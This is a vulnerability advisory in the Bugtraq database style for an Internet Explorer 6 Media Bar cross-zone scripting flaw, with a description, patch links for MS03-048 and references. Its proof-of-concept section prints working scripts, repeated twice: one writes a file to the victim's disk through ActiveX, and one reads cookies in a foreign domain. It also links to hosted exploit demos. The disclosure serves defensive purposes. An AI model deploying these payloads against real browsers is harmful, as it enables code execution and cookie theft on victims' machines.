Microsoft Internet Explorer window.open Media Bar Cross-Zone Scripting Vulnerability
BID:9769
Info
Microsoft Internet Explorer window.open Media Bar Cross-Zone Scripting Vulnerability
| Bugtraq ID: | 9769 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 11 2003 12:00AM |
| Updated: | Sep 11 2003 12:00AM |
| Credit: | Discovery of this issue is credited to jelmer. |
| Vulnerable: |
Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 |
| Not Vulnerable: | |
Discussion
Microsoft Internet Explorer window.open Media Bar Cross-Zone Scripting Vulnerability
It has been reported that Microsoft Internet Explorer may be prone to a cross-zone scripting vulnerability that could ultimately lead to execution of malicious script code and Active Content in the context of the My Computer Zone or a foreign domain. Reportedly, hostile code can be executed in the context of the Media Bar via the '_media' property of the 'window.open' method. Cross-Site scripting attacks are possible as well. This functionality is only available in Internet Explorer 6 and above.
This issue was originally described in BID 8577 "Multiple Microsoft Internet Explorer Script Execution Vulnerabilities".
It has been reported that Microsoft Internet Explorer may be prone to a cross-zone scripting vulnerability that could ultimately lead to execution of malicious script code and Active Content in the context of the My Computer Zone or a foreign domain. Reportedly, hostile code can be executed in the context of the Media Bar via the '_media' property of the 'window.open' method. Cross-Site scripting attacks are possible as well. This functionality is only available in Internet Explorer 6 and above.
This issue was originally described in BID 8577 "Multiple Microsoft Internet Explorer Script Execution Vulnerabilities".
Exploit / POC
Microsoft Internet Explorer window.open Media Bar Cross-Zone Scripting Vulnerability
The following proof of concept has been supplied:
<script>
// '\\42' -> '\42' -> ' " '
img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);'
+ ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);'
+ ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';
inject_html="<img src='" + img_src + "'>";
window.open('file:javascript:document.write("' + inject_html + '")','_media');
</script>
Additional proof of concept for cross site scripting has been supplied as well:
<script>
window.open("http://www.google.com/","_media")
setTimeout(function(){
window.open("file:javascript:alert(document.cookie);","_media")
},5000);
</script>
Proof-of-concept demos are available at the following locations:
http://www.freewebs.com/applesoup/CrossMediaBar/demo.html
http://www.freewebs.com/applesoup/CrossMediaBar/CrossSite.htm
The original proof-of-concept is available at the following location:
http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm
The following proof of concept has been supplied:
<script>
// '\\42' -> '\42' -> ' " '
img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);'
+ ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);'
+ ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';
inject_html="<img src='" + img_src + "'>";
window.open('file:javascript:document.write("' + inject_html + '")','_media');
</script>
Additional proof of concept for cross site scripting has been supplied as well:
<script>
window.open("http://www.google.com/","_media")
setTimeout(function(){
window.open("file:javascript:alert(document.cookie);","_media")
},5000);
</script>
Proof-of-concept demos are available at the following locations:
http://www.freewebs.com/applesoup/CrossMediaBar/demo.html
http://www.freewebs.com/applesoup/CrossMediaBar/CrossSite.htm
The original proof-of-concept is available at the following location:
http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm
Solution / Fix
Microsoft Internet Explorer window.open Media Bar Cross-Zone Scripting Vulnerability
Solution:
This issue has been addressed by Microsoft Security Bulletin MS03-048.
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Solution:
This issue has been addressed by Microsoft Security Bulletin MS03-048.
Microsoft Internet Explorer 6.0 SP1
-
Microsoft Cumulative Security Update for Internet Explorer 6 Service Pack 1 (KB824145)
http://www.microsoft.com/downloads/details.aspx?FamilyId=9D8543E9-0E2B -46C9-B6C6-12DE03860465&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer 6 SP1 64-bit Edition (KB824145)
http://www.microsoft.com/downloads/details.aspx?FamilyId=35F99CF5-3629 -4E0E-BF60-24845D2D20C9&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer for Windows Server 2003 (KB824145)
http://www.microsoft.com/downloads/details.aspx?FamilyId=7D0D02DD-8940 -48E0-B163-3FCDCB558F21&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer for Windows Server 2003 64-bit Edition (KB824145)
http://www.microsoft.com/downloads/details.aspx?FamilyId=8BEFA1EC-0C48 -4B65-989D-58B0CE1E6F95&displaylang=en
Microsoft Internet Explorer 6.0
-
Microsoft Cumulative Security Update for Internet Explorer 6 (KB824145)
http://www.microsoft.com/downloads/details.aspx?FamilyId=4C4D22F0-FBF7 -4EA6-9CC2-27D104D4198E&displaylang=en
References
Microsoft Internet Explorer window.open Media Bar Cross-Zone Scripting Vulnerability
References:
References:
- Microsoft Security Bulletin MS03-048 (Microsoft)
- Internet explorer 6 on windows XP allows exection of arbitrary code (jelmer
- RE: New Internet Explorer Cross Zone/Site Scripting Vulnerability ("Thor Larholm"